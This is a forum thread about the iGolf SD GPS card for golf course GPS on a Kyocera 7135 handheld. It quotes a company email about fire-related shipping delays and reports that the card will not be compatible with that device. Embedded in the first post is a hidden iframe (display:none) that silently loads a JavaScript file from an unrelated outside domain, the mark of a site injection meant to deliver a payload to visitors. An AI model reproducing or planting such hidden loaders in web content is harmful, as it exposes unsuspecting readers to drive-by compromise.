+ Reply to Thread

Thread: sd gps card

sd gps card

searched but no one seems to have mentioned this -

http://www.igolftech.com/sdgps.php

just an idea<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

We're all waiting

Its been mentioned... just not a lot to talk about until it gets released....
    mg

It looks like they are shipping this in november?

"Shipment of your SD GPS package is expected to start the first week in November, depending on your order number."

Igolf SD GPS release MAY be delayed

This Monday (Nov 3) I received this e-mail from Igolf.

Dear Valued Customer:

If you do not already know, Southern California has been devastated by the outbreak of fire the past few weeks. San Diego, in particular, was hit especially hard and fires continue to burn throughout the county.

We at iGolf Technologies have not experienced any personal or property damage, but these recent events have impacted our normal business operations. As you can imagine, either directly or indirectly, everyone in this area has been affected. The area around our office building was evacuated. A blanket of smoke and ash covered most of San Diego, which made simply being outside extremely dangerous. Businesses and schools were closed and entire neighborhoods were leveled by the fire.

Despite the devastation, we are making every attempt to resume normal operations. We promised you shipment of the SD GPS Package by November 15th, 2003 and we are trying to honor that promise. However, if we are unable to ship your SD GPS Package on time, I ask for your patience and understanding. Hopefully things will return to normal soon and shipment to you will not be delayed. You will be contacted again shortly with instructions on how to complete your purchase of the SD GPS Package.

Thank you for your patience. Please let me know if you have any questions or concerns.

Sincerely,

Dan Galatro
    iGolf Technologies

Over the past three months, since sending my deposit for the Igolf SD GPS Package, I have had the good fortune to swap e-mails with their marketing vp. I have a high comfort level regarding their commitment releasing a quality product I am willing to wait a few weeks longer if that gives Igolf the opportunity to get it right the first time.

Regards, Bill Cottun
    bcottun

Igolf GPS Update

Yesterday I received an two e-mails from Dan Galatro, VP of Igolf. He informed me that the Igolf GPS Package I had placed a deposit on three months ago will NOT be compatible with the 7135 when released.

While Igolf has been working with Kyocera on this issue, it seems that Kyocera developed the SDIO on the 7135 using proprietary code.

While I am mildly dissappointed, I am still eager for Igolf to resolve this compatiblity issue and send me their GPS Package soonest.

I will keep you posted;
    bcottun

Hello Bill
    I too am very interested in this card and am hoping that it will be compatible with Intelligolf program that I have been using for a copuple of years. Since the iGolf is compatible with Mapopolis I can only presume that it will be. The advantage that i see with Intelligolf are the 18000 courses available (at no cost) and the tracking of multiple games. http://www.igolftech.com
    I look forward to your report if and when you get the card.

Regads
    Mike

Sorry. the link should have been http://www.intelligolf.com for all those golf enthusiasts.